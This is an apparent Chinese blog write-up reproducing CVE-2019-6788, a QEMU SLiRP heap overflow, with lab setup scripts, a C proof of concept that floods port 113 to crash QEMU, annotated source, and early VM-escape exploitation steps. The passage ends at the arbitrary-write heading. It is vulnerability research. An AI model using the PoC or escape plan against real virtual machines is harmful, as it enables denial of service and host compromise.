CVE-2019-6788-Qemu逃逸漏洞复现与分析

2021-10-24

字数统计: 14.6k字 | 阅读时长≈ 78分

前几天把qemu逃逸相关的题目做了一些，算是初步入门了。最近会调试几个真实的qemu逃逸的漏洞，希望能借此了解qemu漏洞真实攻击面以及利用思路

漏洞描述

qemu-kvm默认使用的是-net nic -net user的参数，提供了一种用户模式(user-mode)的网络模拟。使用用户模式的网络的客户机可以连通宿主机及外部的网络。用户模式网络是完全由QEMU自身实现的，不依赖于其他的工具(bridge-utils、dnsmasq、iptables等)，而且不需要root用户权限。QEMU使用Slirp实现了一整套TCP/IP协议栈，并且使用这个协议栈实现了一套虚拟的NAT网络。SLiRP模块主要模拟了网络应用层协议，其中包括IP协议(v4和v6)、DHCP协议、ARP协议等。

cve-2019-6778这个漏洞存在于QEMU的网络模块SLiRP中，该模块中的tcp_emu()函数对端口113(Identification protocol)的数据进行处理时，没有进行有效的数据验证，导致堆溢出。经过构造，可以实现以QEMU进程权限执行任意代码。

环境搭建

编译qemu

漏洞版本是3.1.50，但是从qemu项目中没有找到这个版本，所以往前找一个版本，最终找到3.1.0，然后使用如下命令编译qemu:

git clone git://git.qemu-project.org/qemu.git
cd qemu
git checkout tags/v3.1.0
mkdir -p bin/debug/naive
cd bin/debug/naive
../../../configure --target-list=x86_64-softmmu --enable-debug --disable-werror
make

编译出来qemu的路径为./qemu/bin/debug/naive/x86_64-softmmu/qemu-system-x86_64。

这里configure的命令--enable-debug将会保留调试符号，更利于调试。

编译文件系统

然后需要编译一个比较完整的文件系统，用以前做内核题时提供的文件系统很多命令都不全，所以这里还是建议自己编译一个更完整的。这里直接参考之前2020-geekpwn提供的文件，制作一个文件系统：

需要先安装debootstrap：

1	sudo apt-get install debootstrap

随后直接使用如下脚本制作文件系统：

mkdir qemu

sudo debootstrap --include=openssh-server,curl,tar,gcc,\
libc6-dev,time,strace,sudo,less,psmisc,\
selinux-utils,policycoreutils,checkpolicy,selinux-policy-default \
stretch qemu

set -eux
 
# Set some defaults and enable promtless ssh to the machine for root.
sudo sed -i '/^root/ { s/:x:/::/ }' qemu/etc/passwd
echo 'T0:23:respawn:/sbin/getty -L ttyS0 115200 vt100' | sudo tee -a qemu/etc/inittab
#printf '\nauto enp0s3\niface enp0s3 inet dhcp\n' | sudo tee -a qemu/etc/network/interfaces
printf '\nallow-hotplug enp0s3\niface enp0s3 inet dhcp\n' | sudo tee -a qemu/etc/network/interfaces
echo 'debugfs /sys/kernel/debug debugfs defaults 0 0' | sudo tee -a qemu/etc/fstab
echo "kernel.printk = 7 4 1 3" | sudo tee -a qemu/etc/sysctl.conf
echo 'debug.exception-trace = 0' | sudo tee -a qemu/etc/sysctl.conf
echo "net.core.bpf_jit_enable = 1" | sudo tee -a qemu/etc/sysctl.conf
echo "net.core.bpf_jit_harden = 2" | sudo tee -a qemu/etc/sysctl.conf
echo "net.ipv4.ping_group_range = 0 65535" | sudo tee -a qemu/etc/sysctl.conf
echo -en "127.0.0.1\tlocalhost\n" | sudo tee qemu/etc/hosts
echo "nameserver 8.8.8.8" | sudo tee -a qemu/etc/resolve.conf
echo "ubuntu" | sudo tee qemu/etc/hostname
sudo mkdir -p qemu/root/.ssh/
rm -rf ssh
mkdir -p ssh
ssh-keygen -f ssh/id_rsa -t rsa -N ''
cat ssh/id_rsa.pub | sudo tee qemu/root/.ssh/authorized_keys
 
# Build a disk image
dd if=/dev/zero of=qemu.img bs=1M seek=2047 count=1
sudo mkfs.ext4 -F qemu.img
sudo mkdir -p /mnt/qemu
sudo mount -o loop qemu.img /mnt/qemu
sudo cp -a qemu/. /mnt/qemu/.
sudo umount /mnt/qem

内核文件

内核文件的编译，可以查看我之前写的关于内核pwn的相关文章，有提到如何编译内核。

启动环境

最后使用如下命令来启动qemu环境：

#!/bin/bash

sudo ./qemu-system-x86_64 \
	-kernel ./bzImage \
	-append "console=ttyS0 root=/dev/sda rw" \
	-hda ./qemu.img \
	-enable-kvm -m 2G -nographic \
	-net user,hostfwd=tcp::2222-:22 -net nic

启动后，qemu虚拟机ip=10.0.2.2，宿主机ip=10.0.15.2。

漏洞分析

这里先用poc文件，来从崩溃点往回溯找到漏洞点：

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main() {
    int s, ret;
    struct sockaddr_in ip_addr;
    char buf[0x500];

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr("10.0.2.2"); // host IP
    ip_addr.sin_port = htons(113);                   // vulnerable port
    ret = connect(s, (struct sockaddr *)&ip_addr, sizeof(struct sockaddr_in));
    memset(buf, 'A', 0x500);
    while (1) {
        write(s, buf, 0x500);
    }
    return 0;
}

解释一下这个poc文件，socket连接宿主机，并不断调用write发送数据，直到发生堆溢出为止，qemu崩溃。

使用gdb attach上程序后，在tcp_emu崩溃后，使用bt查看程序调用栈如下：

gdb-peda$ bt
#0  phys_page_find (d=0x7f559c1fc4c0, addr=0x1f7) at /home/alex/qemu/cve-2019-6788/qemu/
exec.c:375
#1  0x000055f914aea262 in address_space_lookup_region (d=0x7f559c1fc4c0, addr=0x1f7, res
olve_subpage=0x1) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:395
#2  0x000055f914aea307 in address_space_translate_internal (d=0x7f559c1fc4c0, addr=0x1f7
, xlat=0x7f55a68c9908, plen=0x7f55a68c9900, resolve_subpage=0x1) at /home/alex/qemu/cve-
2019-6788/qemu/exec.c:414
#3  0x000055f914aea719 in flatview_do_translate (fv=0x7f559c20c070, addr=0x1f7, xlat=0x7
f55a68c9908, plen_out=0x7f55a68c9900, page_mask_out=0x0, is_write=0x0, is_mmio=0x1, targ
et_as=0x7f55a68c9868, attrs=...) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:552
#4  0x000055f914aea9dc in flatview_translate (fv=0x7f559c20c070, addr=0x1f7, xlat=0x7f55
a68c9908, plen=0x7f55a68c9900, is_write=0x0, attrs=...) at /home/alex/qemu/cve-2019-6788
/qemu/exec.c:618
#5  0x000055f914af09f7 in flatview_read (fv=0x7f559c20c070, addr=0x1f7, attrs=..., buf=0
x7f55a829c000 "", len=0x1) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:3331
#6  0x000055f914af0a9a in address_space_read_full (as=0x55f9158449c0 <address_space_io>,
 addr=0x1f7, attrs=..., buf=0x7f55a829c000 "", len=0x1) at /home/alex/qemu/cve-2019-6788
/qemu/exec.c:3345
#7  0x000055f914af0b79 in address_space_rw (as=0x55f9158449c0 <address_space_io>, addr=0
x1f7, attrs=..., buf=0x7f55a829c000 "", len=0x1, is_write=0x0) at /home/alex/qemu/cve-20
19-6788/qemu/exec.c:3375
#8  0x000055f914b734e1 in kvm_handle_io (port=0x1f7, attrs=..., data=0x7f55a829c000, dir
ection=0x0, size=0x1, count=0x1) at /home/alex/qemu/cve-2019-6788/qemu/accel/kvm/kvm-all
.c:1775
#9  0x000055f914b73c91 in kvm_cpu_exec (cpu=0x55f915c08600) at /home/alex/qemu/cve-2019-
6788/qemu/accel/kvm/kvm-all.c:2021
#10 0x000055f914b38d83 in qemu_kvm_cpu_thread_fn (arg=0x55f915c08600) at /home/alex/qemu
/cve-2019-6788/qemu/cpus.c:1281
#11 0x000055f9150a25b6 in qemu_thread_start (args=0x55f915c2ad90) at /home/alex/qemu/cve
-2019-6788/qemu/util/qemu-thread-posix.c:498
#12 0x00007f55a7e39609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#13 0x00007f55a7d5e293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

这里和其他师傅的调试时的结果不同，我这里的崩溃栈并不会直接在tcp_emu函数中发生。原因我猜测是可能我用的系统版本是20.10，环境变化导致。

所以这里想通过崩溃反推回漏洞点，还比较困难 : (

这里接着还是结合源码来分析吧。

源码首先分析slirp/tcp_subr.c中的tcp_emu函数：

int tcp_emu(struct socket *so, struct mbuf *m)
{
	Slirp *slirp = so->slirp;
	u_int n1, n2, n3, n4, n5, n6;
        char buff[257];
	uint32_t laddr;
	u_int lport;
	char *bptr;

	DEBUG_CALL("tcp_emu");
	DEBUG_ARG("so = %p", so);
	DEBUG_ARG("m = %p", m);

	switch(so->so_emu) {
		int x, i;

	 case EMU_IDENT:
		/*
		 * Identification protocol as per rfc-1413
		 */

		{
			struct socket *tmpso;
			struct sockaddr_in addr;
			socklen_t addrlen = sizeof(struct sockaddr_in);
			struct sbuf *so_rcv = &so->so_rcv;

			memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);					//[1]
			so_rcv->sb_wptr += m->m_len;													//[2]
			so_rcv->sb_rptr += m->m_len;
			m->m_data[m->m_len] = 0; /* NULL terminate */			
			if (strchr(m->m_data, '\r') || strchr(m->m_data, '\n')) {		//[3]
				if (sscanf(so_rcv->sb_data, "%u%*[ ,]%u", &n1, &n2) == 2) {
					HTONS(n1);
					HTONS(n2);
					/* n2 is the one on our host */
					for (tmpso = slirp->tcb.so_next;
					     tmpso != &slirp->tcb;
					     tmpso = tmpso->so_next) {
						if (tmpso->so_laddr.s_addr == so->so_laddr.s_addr &&
						    tmpso->so_lport == n2 &&
						    tmpso->so_faddr.s_addr == so->so_faddr.s_addr &&
						    tmpso->so_fport == n1) {
							if (getsockname(tmpso->s,
								(struct sockaddr *)&addr, &addrlen) == 0)
							   n2 = ntohs(addr.sin_port);
							break;
						}
					}
				}
        so_rcv->sb_cc = snprintf(so_rcv->sb_data,so_rcv->sb_datalen,"%d,%d\r\n", n1, n2); //[4]
				so_rcv->sb_rptr = so_rcv->sb_data;
				so_rcv->sb_wptr = so_rcv->sb_data + so_rcv->sb_cc;		//[5]
			}
			m_free(m);
			return 0;
		}

函数的参数so为当前连接的socket对象，m为当前的消息包传输层的消息结构体，分别如下：

struct socket {
  struct socket *so_next,*so_prev;      /* For a linked list of sockets */

  int s;                           /* The actual socket */

  int pollfds_idx;                 /* GPollFD GArray index */

  Slirp *slirp;			   /* managing slirp instance */

			/* XXX union these with not-yet-used sbuf params */
  struct mbuf *so_m;	           /* Pointer to the original SYN packet,
				    * for non-blocking connect()'s, and
				    * PING reply's */
  struct tcpiphdr *so_ti;	   /* Pointer to the original ti within

  ...

  uint8_t	so_emu;		/* Is the socket emulated? */

  uint8_t       so_type;        /* Type of socket, UDP or TCP */
  int32_t       so_state;       /* internal state flags SS_*, below */

  struct 	tcpcb *so_tcpcb;	/* pointer to TCP protocol control block */
  u_int	so_expire;		/* When the socket will expire */

  int	so_queued;		/* Number of packets queued from this socket */
  int	so_nqueued;		/* Number of packets queued in a row
				 * Used to determine when to "downgrade" a session
					 * from fastq to batchq */

  struct sbuf so_rcv;		/* Receive buffer */
  struct sbuf so_snd;		/* Send buffer */
  void * extra;			/* Extra pointer */
};


struct mbuf {
	/* XXX should union some of these! */
	/* header at beginning of each mbuf: */
	struct	mbuf *m_next;		/* Linked list of mbufs */
	struct	mbuf *m_prev;
	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
	int	m_flags;		/* Misc flags */

	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
	struct	socket *m_so;

	caddr_t	m_data;			/* Current location of data */
	int	m_len;			/* Amount of data in this mbuf, from m_data */

	Slirp *slirp;
	bool	resolution_requested;
	uint64_t expiration_date;
	char   *m_ext;
	/* start of dynamic buffer area, must be last element */
	char    m_dat[];
};

当socket数据包类型为EMU_IDENT时，程序会在[1]处先将m->data中的数据拷贝至so_rcv->sb_wptr。so_rcv的定义为struct sbuf。mbuf是用来保存ip传输层的数据，sbuf结构体则保存tcp网络层的数据，定义如下：

其中重点关注sb_cc参数该参数是用于记录在sb_data中字符串的长度。

struct sbuf {
	uint32_t sb_cc;		/* actual chars in buffer */
	uint32_t sb_datalen;	/* Length of data  */
	char	*sb_wptr;	/* write pointer. points to where the next
				 * bytes should be written in the sbuf */
	char	*sb_rptr;	/* read pointer. points to where the next
				 * byte should be read from the sbuf */
	char	*sb_data;	/* Actual data */
};

程序将m->data中的数据拷贝至so_rcv->sb_wptr后，会在[2]处更新当前sbuf的读写指针，以便后续接着写入。随后在[3]处会判断输入的消息字符串中是否没有\r或\n，如果有的话会进入[4]处。在[4]处，会使用snprintf来获得sb_data中的字符串长度，并将其返回给sb_cc，以此来更新sb_cc。最后就会进入[5]处，在此处会将写入指针进行更新。

但是，如果没有\r或\n，那么则不会执行[4]，而是直接进入返回状态，也就是相当于没有更新sb_cc，也没有更新sb_wptr.

函数最后会释放m的堆块，并返回0。

那么接着，我们查看tcp_emu函数的交叉引用，在tcp_input函数中，发现了相关调用。

代码在slirp/tcp_input.c中:

#define sbspace(sb) ((sb)->sb_datalen - (sb)->sb_cc)

else if (ti->ti_ack == tp->snd_una &&
		    tcpfrag_list_empty(tp) &&
		    ti->ti_len <= sbspace(&so->so_rcv)) {			//范围检测，防止溢出
			/*
			 * this is a pure, in-sequence data packet
			 * with nothing on the reassembly queue and
			 * we have enough buffer space to take it.
			 */
			tp->rcv_nxt += ti->ti_len;
			/*
			 * Add data to socket buffer.
			 */
			if (so->so_emu) {
				if (tcp_emu(so,m)) sbappend(so, m);		//调用tcp_emu拷贝数据
			} else
				sbappend(so, m);

			/*
			 * If this is a short packet, then ACK now - with Nagel
			 *	congestion avoidance sender won't send more until
			 *	he gets an ACK.
			 *
			 * It is better to not delay acks at all to maximize
			 * TCP throughput.  See RFC 2581.
			 */
			tp->t_flags |= TF_ACKNOW;
			tcp_output(tp);
			return;
		}

这里首先可以看到使用了sbspace来检测so->so_rcv是否溢出，检查的方法是检查sb_datalen - sb_cc是否大于ti->ti_len。在上面提到sb_datalen表示当前消息缓冲区的总大小，sb_cc表示实际写入的字符串大小。ti结构体如下所示：

/*
 * Tcp+ip header, after ip options removed.
 */
struct tcpiphdr {
    struct mbuf_ptr ih_mbuf;	/* backpointer to mbuf */
    union {
        struct {
            struct  in_addr ih_src; /* source internet address */
            struct  in_addr ih_dst; /* destination internet address */
            uint8_t ih_x1;          /* (unused) */
            uint8_t ih_pr;          /* protocol */
        } ti_i4;
        struct {
            struct  in6_addr ih_src;
            struct  in6_addr ih_dst;
            uint8_t ih_x1;
            uint8_t ih_nh;
        } ti_i6;
    } ti;
    uint16_t    ti_x0;
    uint16_t    ti_len;             /* protocol length */
    struct      tcphdr ti_t;        /* tcp header */
};

ti->ti_len表示协议长度，那么这里的长度检查就是判断so_rcv的数据长度是否大于协议长度，如果满足则进入下一步。

随后会判断是否so->so_emu是否赋值，如果赋值，则执行tcp_emu。我们前面已经说明了tcp_emu此时会返回0，也就是最后并不会执行sbappend(so, m)函数。

漏洞点总结

上面对tcp_emu和tcp_input函数都有了说明，这里总结一下漏洞原因。

1、首先进入tcp_input函数，会先调用sbspace来检查缓冲区是否溢出，根据(sb)->sb_datalen - (sb)->sb_cc计算剩余缓冲区长度；

2、随后设置了so->so_emu后，会进入tcp_emu函数；

3、如果so->so_emu等于EMU_IDENT时，会调用memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);拷贝ip传输层消息到tcp网络层消息;

4、随后会更新so_rcv->sb_wptr += m->m_len;;

5、如果m_data中不包含\r和\n时，则不会进入so_rcv->sb_cc = snprintf(so_rcv->sb_data,so_rcv->sb_datalen,"%d,%d\r\n", n1, n2);，那么sb_cc就永远为0，并且sb_wptr仍然为4中的值；

6、随后tcp_emu函数返回，继续进入下一次写；

7、第二次写时，又进入tcp_input，由于sb_cc=0，所以sbspace缓冲区检查将会顺利通过；

8、再次进入tcp_emu函数，继续执行memcpy，此时sb_wptr已经加上了第一次写入的长度，那么就会继续对缓冲区增加写入m_len长度的数据;

9、如果m_data仍然不包含\r和\n时，则sb_cc仍然等于0。

10、最后程序循环执行从7到9的步骤，在第8步中 mempcy导致了堆溢出。

漏洞触发

结合最开始提供的poc，说明一下如何触发该漏洞：

首先要想进入tcp_input的漏洞部分，需要保证ti->ti_len不为0，这个只要保证设置了地址协议族为AF_INET即可。

随后要想进入tcp_emu协议部分，需要保证so->so_emu为EMU_IDENT标识位。经过分析这需要保证tcp协议为标识协议Identification Protocol，该协议的简介如下：

“Identification Protocol（标识协议）”在 RFC 1413 中描述。实际上每个类 Unix 操作系统都带着一个默认监听 TCP 113 端口的 ident 服务器

所以，这里我们需要保证目标端口是113，然后该TCP协议就会自动被标识为EMU_IDENT。

漏洞利用

前面已经提到我们拥有一个堆溢出漏洞。一个堆溢出漏洞的利用，我想到的主要利用思路有两种：

1、在后面布置含有函数指针的堆块，通过堆溢出修改目标函数指针，达到劫持控制流的思路；

2、在后面布置含有读写指针的堆块，通过修改读写指针来实现任意地址写，然后在去劫持控制流。

但是，要想顺利的将一个目标堆块布置在我们的漏洞堆块后，需要实现一个堆风水布局，这里理想的方法是通过top chunk来分配这两个堆块，那么即能稳定实现两个堆块的先后顺序。但是为了实现从top chunk分配，我们首先需要拥有一个malloc原语来消耗多余的堆块。

malloc原语

这里和之前分析vmware dhcp逃逸时类似，都是需要去查看tcp\ip的其他功能中是否能够找到一个可控的malloc原语。首先复习一下IP协议：

Zero:Unused，置为0
Do not fragment flag:表示数据包是否为分片数据包，当置为1时，表示未分片，简写为DF位
More fragments following flag:表示后续还有没无分包，有的话置为1，简写为MF位
Fragment Offset：当前数据包在整个大数据包中的偏移offset。

IP包的total_length用2字节表示，因此一个IP数据包最大为65535字节，一旦要发送大量数据时我们需要对数据包进行分段传输，IP协议各字段如下所示。

接着，分析一下qemu中对于IP协议的处理，首先查看一下IP结构体，每个字段都能与上图中的IP图对照起来：

/*
 * Structure of an internet header, naked of options.
 */
struct ip {
#ifdef HOST_WORDS_BIGENDIAN
	uint8_t ip_v:4,			/* version */
		ip_hl:4;		/* header length */
#else
	uint8_t ip_hl:4,		/* header length */
		ip_v:4;			/* version */
#endif
	uint8_t		ip_tos;			/* type of service */
	uint16_t	ip_len;			/* total length */
	uint16_t	ip_id;			/* identification */
	uint16_t	ip_off;			/* fragment offset field */
#define	IP_DF 0x4000			/* don't fragment flag */
#define	IP_MF 0x2000			/* more fragments flag */
#define	IP_OFFMASK 0x1fff		/* mask for fragmenting bits */
	uint8_t ip_ttl;			/* time to live */
	uint8_t ip_p;			/* protocol */
	uint16_t	ip_sum;			/* checksum */
	struct	in_addr ip_src,ip_dst;	/* source and dest address */
} QEMU_PACKED;

随后，我们主要关注slirp/ip_input.c中的ip_input函数：

/*
 * Ip input routine.  Checksum and byte swap header.  If fragmented
 * try to reassemble.  Process options.  Pass to next level.
 */
void ip_input(struct mbuf *m)
{
	Slirp *slirp = m->slirp;
	register struct ip *ip;
	int hlen;

	if (!slirp->in_enabled) {
		goto bad;
	}

	DEBUG_CALL("ip_input");
	DEBUG_ARG("m = %p", m);
	DEBUG_ARG("m_len = %d", m->m_len);

	if (m->m_len < sizeof (struct ip)) {		//消息长度是否超过IP包长度
		goto bad;
	}

	ip = mtod(m, struct ip *);

	if (ip->ip_v != IPVERSION) {	//检查IP版本
		goto bad;
	}

	hlen = ip->ip_hl << 2;
	if (hlen<sizeof(struct ip ) || hlen>m->m_len) {/* min header length */
	  goto bad;                                  /* or packet too short */
	}

        /* keep ip header intact for ICMP reply
	 * ip->ip_sum = cksum(m, hlen);
	 * if (ip->ip_sum) {
	 */
	if(cksum(m,hlen)) {		//IP校验值检查
	  goto bad;
	}

	/*
	 * Convert fields to host representation.
	 */
	NTOHS(ip->ip_len);
	if (ip->ip_len < hlen) {		//IP包长度检查
		goto bad;
	}
	NTOHS(ip->ip_id);
	NTOHS(ip->ip_off);

	/*
	 * Check that the amount of data in the buffers
	 * is as at least much as the IP header would have us expect.
	 * Trim mbufs if longer than we expect.
	 * Drop packet if shorter than we expect.
	 */
	if (m->m_len < ip->ip_len) {	//如果消息长度小于IP包长度，则丢弃
		goto bad;
	}

	/* Should drop packet if mbuf too long? hmmm... */
	if (m->m_len > ip->ip_len)		//如果消息长度超过IP包长度，则裁剪消息长度
	   m_adj(m, ip->ip_len - m->m_len);

	/* check ip_ttl for a correct ICMP reply */
	if (ip->ip_ttl == 0) {			//检查TTL是否为0，如果为0使用icmp发送返回包
	    icmp_send_error(m, ICMP_TIMXCEED, ICMP_TIMXCEED_INTRANS, 0, "ttl");
	    goto bad;
	}

  // [1] 之前都是对IP各标识位的检查
	/*
	 * If offset or IP_MF are set, must reassemble.
	 * Otherwise, nothing need be done.
	 * (We could look in the reassembly queue to see
	 * if the packet was previously fragmented,
	 * but it's not worth the time; just let them time out.)
	 *
	 * XXX This should fail, don't fragment yet
	 */
	if (ip->ip_off &~ IP_DF) {	//如果设置了IP分段
	  register struct ipq *fp;
      struct qlink *l;
		/*
		 * Look for queue of fragments
		 * of this datagram.
		 */
		for (l = slirp->ipq.ip_link.next; l != &slirp->ipq.ip_link;
		     l = l->next) {
            fp = container_of(l, struct ipq, ip_link);	// 查找是否已经在包序列中
            if (ip->ip_id == fp->ipq_id &&
                    ip->ip_src.s_addr == fp->ipq_src.s_addr &&
                    ip->ip_dst.s_addr == fp->ipq_dst.s_addr &&
                    ip->ip_p == fp->ipq_p)
		    goto found;
        }
        fp = NULL;
	found:

		/*
		 * Adjust ip_len to not reflect header,
		 * set ip_mff if more fragments are expected,
		 * convert offset of this to bytes.
		 */
		ip->ip_len -= hlen;       
		if (ip->ip_off & IP_MF)     // 设置服务类型
		  ip->ip_tos |= 1;
		else
		  ip->ip_tos &= ~1;

		ip->ip_off <<= 3;     //找到后，重新设置分包的偏移

		/*
		 * If datagram marked as having more fragments
		 * or if this is not the first fragment,
		 * attempt reassembly; if it succeeds, proceed.
		 */
		if (ip->ip_tos & 1 || ip->ip_off) {    // 重组分包序列
			ip = ip_reass(slirp, ip, fp);
      if (ip == NULL)
				return;
			m = dtom(slirp, ip);
		} else
			if (fp)										//如果没有分包或是第一个片段不需要重组
		   	   ip_freef(slirp, fp);

	} else
		ip->ip_len -= hlen;				//修改包文剩余长度

  
  //[2] ip 分片包处理
  
	/*
	 * Switch out to protocol's input routine.
	 */
	switch (ip->ip_p) {	// [3] 按照传输层协议处理
	 case IPPROTO_TCP:
		tcp_input(m, hlen, (struct socket *)NULL, AF_INET);
		break;
	 case IPPROTO_UDP:
		udp_input(m, hlen);
		break;
	 case IPPROTO_ICMP:
		icmp_input(m, hlen);
		break;
	 default:
		m_free(m);
	}
	return;
bad:
	m_free(m);
}

对上面的代码，做一个简单的分析：

1、在[1]处之前，都是对IP各标志位的检查，包括：对IP版本、数据包长度、消息长度、校验值和TTL的检查；

2、在[2]处开始，对IP分片包进行处理，首先会从分片包队列中查找该报文是否为以前的IP分包序列，如果该报文是以前有的包文序列的分包，则进入包重组阶段；

3、在包重组阶段中，会首先调用ip_reass进行包重组

4、如果该报文不是分包序列，或者是第一个分包，则释放该分包，直接进行后续传输层协议处理的部分

我们接着看一下ip_reass是如何重组分包序列的：

/*
 * Take incoming datagram fragment and try to
 * reassemble it into whole datagram.  If a chain for
 * reassembly of this datagram already exists, then it
 * is given as fp; otherwise have to make a chain.
 */
static struct ip *
ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)
{
	register struct mbuf *m = dtom(slirp, ip);
	register struct ipasfrag *q;
	int hlen = ip->ip_hl << 2;
	int i, next;

	DEBUG_CALL("ip_reass");
	DEBUG_ARG("ip = %p", ip);
	DEBUG_ARG("fp = %p", fp);
	DEBUG_ARG("m = %p", m);

	/*
	 * Presence of header sizes in mbufs
	 * would confuse code below.
         * Fragment m_data is concatenated.
	 */
	m->m_data += hlen;		// 数据长度增加						[1]
	m->m_len -= hlen;			// 缓冲区剩余长度减少

	/*
	 * If first fragment to arrive, create a reassembly queue.
	 */
  if (fp == NULL) {				//如果第一个包片段到达，创建一个重组队列		[2]
	  		struct mbuf *t = m_get(slirp);

	  if (t == NULL) {				//创建失败，则丢弃该包片段
	      goto dropfrag;
	  }
	  fp = mtod(t, struct ipq *);					//将mbuf转换为一个数据区
	  insque(&fp->ip_link, &slirp->ipq.ip_link);
	  fp->ipq_ttl = IPFRAGTTL;			//设置包序列
	  fp->ipq_p = ip->ip_p;
	  fp->ipq_id = ip->ip_id;
	  fp->frag_link.next = fp->frag_link.prev = &fp->frag_link;
	  fp->ipq_src = ip->ip_src;
	  fp->ipq_dst = ip->ip_dst;
	  q = (struct ipasfrag *)fp;
	  goto insert;								//进入插入流程
	}	

	/*
	 * Find a segment which begins after this one does.
	 */
	for (q = fp->frag_link.next; q != (struct ipasfrag *)&fp->frag_link;
            q = q->ipf_next)
		if (q->ipf_off > ip->ip_off)		//找到当前要插入的位置的包片段
			break;

	/*
	 * If there is a preceding segment, it may provide some of
	 * our data already.  If so, drop the data from the incoming
	 * segment.  If it provides all of our data, drop us.
	 */
  //判断传入的包片段是否重复，如果重复删除
	if (q->ipf_prev != &fp->frag_link) {
    struct ipasfrag *pq = q->ipf_prev;
		i = pq->ipf_off + pq->ipf_len - ip->ip_off;
		if (i > 0) {
			if (i >= ip->ip_len)
				goto dropfrag;
			m_adj(dtom(slirp, ip), i);
			ip->ip_off += i;
			ip->ip_len -= i;
		}
	}

	/*
	 * While we overlap succeeding segments trim them or,
	 * if they are completely covered, dequeue them.
	 */
  //如果我们覆盖了连续的片段，则重新处理
	while (q != (struct ipasfrag*)&fp->frag_link &&
            ip->ip_off + ip->ip_len > q->ipf_off) {
		i = (ip->ip_off + ip->ip_len) - q->ipf_off;
		if (i < q->ipf_len) {
			q->ipf_len -= i;
			q->ipf_off += i;
			m_adj(dtom(slirp, q), i);
			break;
		}
		q = q->ipf_next;
		m_free(dtom(slirp, q->ipf_prev));
		ip_deq(q->ipf_prev);
	}

insert:		//插入片段
	/*
	 * Stick new segment in its place;
	 * check for complete reassembly.
	 */
  //将ip片段插入链表内
	ip_enq(iptofrag(ip), q->ipf_prev);
	next = 0;
	for (q = fp->frag_link.next; q != (struct ipasfrag*)&fp->frag_link;
            q = q->ipf_next) {
		if (q->ipf_off != next)
            return NULL;
		next += q->ipf_len;		//修改指针
	}
	if (((struct ipasfrag *)(q->ipf_prev))->ipf_tos & 1)
                return NULL;

	/*
	 * Reassembly is complete; concatenate fragments.
	 */
  q = fp->frag_link.next;					//如果分片包接受完毕，调用m_cat整合全部的分片包
	m = dtom(slirp, q);							//分片链表的头节点

	q = (struct ipasfrag *) q->ipf_next;
	while (q != (struct ipasfrag*)&fp->frag_link) {
	  struct mbuf *t = dtom(slirp, q);
	  q = (struct ipasfrag *) q->ipf_next;
	  m_cat(m, t);							//整合分片包
	}

	/*
	 * Create header for new ip packet by
	 * modifying header of first packet;
	 * dequeue and discard fragment reassembly header.
	 * Make header visible.
	 */
	q = fp->frag_link.next;

	/*
	 * If the fragments concatenated to an mbuf that's
	 * bigger than the total size of the fragment, then and
	 * m_ext buffer was alloced. But fp->ipq_next points to
	 * the old buffer (in the mbuf), so we must point ip
	 * into the new buffer.
	 */
	if (m->m_flags & M_EXT) {
	  int delta = (char *)q - m->m_dat;
	  q = (struct ipasfrag *)(m->m_ext + delta);
	}

  ip = fragtoip(q);
	ip->ip_len = next;
	ip->ip_tos &= ~1;
	ip->ip_src = fp->ipq_src;
	ip->ip_dst = fp->ipq_dst;
	remque(&fp->ip_link);
	(void) m_free(dtom(slirp, fp));
	m->m_len += (ip->ip_hl << 2);
	m->m_data -= (ip->ip_hl << 2);

	return ip;

dropfrag:
	m_free(m);
        return NULL;
}

IP重组流程如下：

1、修改消息结构体m中的消息的长度和剩余缓冲区的长度；

2、判断现在IP片段是否是第一个分片包，如果是则调用m_get创建一个消息结构mbuf用于存储分片包，并对其进行相应的初始化设置，随后进入插入流程；

3、在插入流程中，会调用ip_enq函数，将IP片段插入队列中，并更新当前的链表指针。

4、如果在第2步中，不是第一个分片包，则找到当前要插入的位置，然后判断要插入的分片包是否有重复，没有重复的话再进入插入流程。

5、如果接受到了最后一个分片数据包，那么函数会调用m_cat去整合前面接受到的全部分片数据包。

m_get函数创建一个重组队列，如下所示：

/*
 * Get an mbuf from the free list, if there are none
 * allocate one
 *
 * Because fragmentation can occur if we alloc new mbufs and
 * free old mbufs, we mark all mbufs above mbuf_thresh as M_DOFREE,
 * which tells m_free to actually g_free() it
 */
struct mbuf * m_get(Slirp *slirp)
{
	register struct mbuf *m;
	int flags = 0;

	DEBUG_CALL("m_get");

	if (slirp->m_freelist.qh_link == &slirp->m_freelist) {		//如果当前的空闲链表中没有空闲的消息结构
                m = g_malloc(SLIRP_MSIZE);				//则调用malloc分配一个消息结构
		slirp->mbuf_alloced++;
		if (slirp->mbuf_alloced > MBUF_THRESH)
			flags = M_DOFREE;
		m->slirp = slirp;
	} else {
		m = (struct mbuf *) slirp->m_freelist.qh_link;		//如果有，则直接取出空闲的消息结构
		remque(m);
	}

	/* Insert it in the used list */
	insque(m,&slirp->m_usedlist);												//将该消息结构体插入使用链表
	m->m_flags = (flags | M_USEDLIST);

	/* Initialise it */
	m->m_size = SLIRP_MSIZE - offsetof(struct mbuf, m_dat);		//初始化消息结构
	m->m_data = m->m_dat;
	m->m_len = 0;
        m->m_nextpkt = NULL;
        m->m_prevpkt = NULL;
        m->resolution_requested = false;
        m->expiration_date = (uint64_t)-1;
	DEBUG_ARG("m = %p", m);
	return m;
}

在m_get函数中，可以看到如果在当前空闲链表中找不到空闲的消息结构体对象，则会调用g_malloc分配一个消息对象，大小为SLIRP_MSIZE=0x668。

总结：当IP报文含有分片标志位DF=0时，且空闲消息链表中没有剩余的空闲消息时，则会调用gmalloc分配一个0x668的消息对象。

那么，这里如果能够不断的去发送含有分片的IP报文，那么就能够在消耗完空闲消息链表后，实现gmalloc分配堆块。

任意地址写

